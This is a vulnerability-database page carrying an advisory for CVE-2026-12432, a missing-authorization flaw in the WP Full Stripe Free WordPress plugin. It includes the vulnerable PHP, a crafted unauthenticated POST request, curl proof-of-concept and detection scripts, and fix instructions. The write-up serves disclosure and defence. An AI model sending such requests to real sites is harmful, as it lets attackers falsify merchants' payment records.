Lucene search
K

๐Ÿ“„ WordPress WP Full Stripe Free 8.4.3 Missing Authorization

๐Ÿ—“๏ธย 29 Jun 2026ย 00:00:00Reported byย PolosssTypeย 
packetstorm
ย packetstorm
๐Ÿ”—ย packetstorm.news๐Ÿ‘ย 23ย Views

WP Full Stripe Free versions up to 8.4.3 permit missing authorization via AJAX wpfs_update_failed_payment_status.

Related
Code
# CVE-2026-12432: WP Full Stripe Free <= 8.4.3 - Missing Authorization
    
    ## Overview
    
    - **CVE ID**: CVE-2026-12432
    - **CVSS Score**: 5.3 (Medium)
    - **CVSS Vector**: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N
    - **Affected**: Stripe Payment Forms by WP Full Pay <= 8.4.3
    - **Patched**: >= 8.4.4
    - **Published**: June 26, 2026
    - **Last Updated**: June 27, 2026
    - **Researcher**: Netwurm - VTDR e.V.i.G.
    
    ## Vulnerability Description
    
    The WP Full Stripe Free plugin for WordPress is vulnerable to **Missing Authorization** in versions up to, and including, **8.4.3** via the `wpfs_update_failed_payment_status` AJAX action.
    
    ### Root Cause
    
    The vulnerable AJAX endpoint is registered through both `wp_ajax_` and `wp_ajax_nopriv_` hooks:
    
    ```php
    // wpfs-customer.php, Line 705-706
    add_action( 'wp_ajax_wpfs_update_failed_payment_status', [ $this, 'update_failed_payment_status' ] );
    add_action( 'wp_ajax_nopriv_wpfs_update_failed_payment_status', [ $this, 'update_failed_payment_status' ] );
    ```
    
    The `update_failed_payment_status()` function (Line 3835-3865) performs:
    - โŒ **NO capability check** (no `current_user_can()`)
    - โŒ **NO nonce verification** (no `wp_verify_nonce()`)
    - โŒ **NO logged-in check** (no `is_user_logged_in()`)
    
    ### Vulnerable Code
    
    ```php
    // wpfs-customer.php, Line 3835-3865
    function update_failed_payment_status() {
        try {
            $result = [];
            $failureCode = isset( $_POST['failureCode'] ) ? sanitize_text_field( $_POST['failureCode'] ) : null;
            $failureMessage = isset( $_POST['failureMessage'] ) ? sanitize_text_field( $_POST['failureMessage'] ) : null;
            $paymentIntentId = isset( $_POST['paymentIntentId'] ) ? sanitize_text_field( $_POST['paymentIntentId'] ) : null;
    
            $paymentIntent = $this->stripe->retrievePaymentIntent( $paymentIntentId );
            // ... no auth check before processing ...
    
            $updateData = [
                'paid' => 0,
                'captured' => 0,
                'refunded' => 0
            ];
    
            // Attacker can overwrite with controlled values
            if ( $lastCharge ) {
                $updateData['last_charge_status'] = $lastCharge->status;
                $updateData['failure_code'] = $lastCharge->failure_code;
                $updateData['failure_message'] = $lastCharge->failure_message;
            } else {
                $updateData['last_charge_status'] = 'failed';
                $updateData['failure_code'] = $failureCode;
                $updateData['failure_message'] = $failureMessage;
            }
    
            $this->db->updatePaymentByEventId( $paymentIntentId, $updateData );
            // ...
        }
    }
    ```
    
    ## Attack Vector
    
    ### Prerequisites
    - Payment Intent ID must be known (exposed in browser during normal Stripe checkout)
    - No authentication required
    
    ### Attack Steps
    
    1. **Identify Target**: Find WordPress site with WP Full Stripe Free <= 8.4.3 installed
    2. **Obtain Payment Intent ID**: Extract from Stripe.js checkout flow or prior transactions
    3. **Send Malicious Request**: Craft POST request to admin-ajax.php with attacker-controlled parameters
    
    ### HTTP Request
    
    ```http
    POST /wp-admin/admin-ajax.php HTTP/1.1
    Host: target.com
    Content-Type: application/x-www-form-urlencoded
    
    action=wpfs_update_failed_payment_status&paymentIntentId=pi_XXXX&failureCode=ATTACKER_CODE&failureMessage=ATTACKER_MESSAGE
    ```
    
    ## Impact Assessment
    
    | Impact Area | Severity | Description |
    |-------------|----------|-------------|
    | **Integrity** | Medium | Attackers can mark successful payments as failed |
    | **Confidentiality** | None | No data exposure |
    | **Availability** | Low | Could disrupt business operations |
    
    ### Specific Impacts
    
    1. **Payment Record Manipulation**: Attacker can modify payment status from "paid" to "failed"
    2. **False Failure Codes**: Attacker can inject arbitrary failure codes/messages
    3. **Social Engineering**: Could be used to defraud customers or dispute legitimate charges
    4. **Audit Trail Corruption**: Business records can be falsified
    
    ## Proof of Concept (curl)
    
    ### Basic Detection
    
    ```bash
    # Test if endpoint is accessible without authentication
    curl -s -k -X POST "https://TARGET/wp-admin/admin-ajax.php" \
      -d "action=wpfs_update_failed_payment_status" \
      -d "paymentIntentId=test_cve202612432" \
      -d "failureCode=TEST_CODE" \
      -d "failureMessage=TEST_MESSAGE"
    
    # Expected response (vulnerable):
    # {"success":false,"messageTitle":"Internal Error","message":"Invalid API Key provided...","exceptionMessage":"..."}
    
    # The key indicator is that the endpoint responds WITHOUT requiring authentication
    ```
    
    ### Full PoC Script
    
    ```bash
    #!/bin/bash
    TARGET="https://TARGET"
    
    # Check if vulnerable
    echo "[*] Testing CVE-2026-12432..."
    
    RESPONSE=$(curl -s -k -X POST "$TARGET/wp-admin/admin-ajax.php" \
      -d "action=wpfs_update_failed_payment_status" \
      -d "paymentIntentId=test_123" \
      -d "failureCode=XSS" \
      -d "failureMessage=INJECTED")
    
    if echo "$RESPONSE" | grep -q "success"; then
        echo "[+] VULNERABLE - Endpoint accessible without auth"
    else
        echo "[-] Not vulnerable or error"
    fi
    ```
    
    ## Remediation
    
    ### Immediate Fix
    
    Add authorization check to `wpfs-customer.php` at line 3835:
    
    ```php
    function update_failed_payment_status() {
        // ADD THIS CHECK
        if (!current_user_can('manage_options')) {
            wp_die('Unauthorized');
        }
        // ... rest of function
    }
    ```
    
    ### Recommended Fix (by vendor)
    
    Update to **WP Full Stripe Free >= 8.4.4**
    
    ```bash
    # Via WordPress Admin
    Dashboard > Plugins > WP Full Stripe > Update
    
    # Via WP-CLI
    wp plugin update wp-full-stripe-free
    
    # Via SSH
    wp plugin update wp-full-stripe-free --version=8.4.4
    ```
    
    ## Detection
    
    ### Manual Check
    
    1. Check plugin version in WordPress admin
    2. Review `wp-content/plugins/wp-full-stripe-free/includes/wpfs-customer.php`
    3. Look for missing `current_user_can()` before AJAX handlers
    
    ### Automated Detection
    
    ```bash
    # Check if vulnerable version is installed
    curl -s https://TARGET/wp-content/plugins/wp-full-stripe-free/readme.txt | grep -i "Stable tag"
    
    # Test AJAX endpoint
    curl -s -k -X POST "https://TARGET/wp-admin/admin-ajax.php" \
      -d "action=wpfs_update_failed_payment_status" \
      -d "paymentIntentId=test" | grep -q "success" && echo "Potentially Vulnerable"
    ```
    
    ## References
    
    - [Wordfence Intelligence](https://www.wordfence.com/threat-intel/vulnerabilities/cve-2026-12432)
    - [Plugin Trac](https://plugins.trac.wordpress.org/browser/wp-full-stripe-free/tags/8.4.3/includes/wpfs-customer.php)
    - [Patchstack Database](https://patchstack.com/database/)
    
    ## W.P.E.F
    - [W.P.E.F Telegram chanel #1](https://t.me/wpef0)
    - [W.P.E.F Telegram chanel #2](https://t.me/wpef01)
    --
    
    ## Timeline
    
    - **June 26, 2026**: Vulnerability publicly disclosed
    - **June 27, 2026**: CVE-2026-12432 published
    - **Patch**: Update to >= 8.4.4

Data

Build on a solid foundation withย Vulners data

Weย provide theย essential building blocks forย cybersecurity solutions withย comprehensive, structured, andย constantly updated vulnerability andย exploits data

Api

Power your application withย Vulners API

The Vulners REST API offers reliable, high-performance access toย vulnerabilityย intelligence, withย 99.9%ย SLAย uptime andย CDN-backed data delivery forย seamlessย global access

App

Assess and manage vulnerabilities withย Vulnersย tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

29 Jun 2026 00:00Current
5.8Medium risk
Vulners AI Score5.8
CVSS 3.15.3
EPSS0.00323
SSVC
23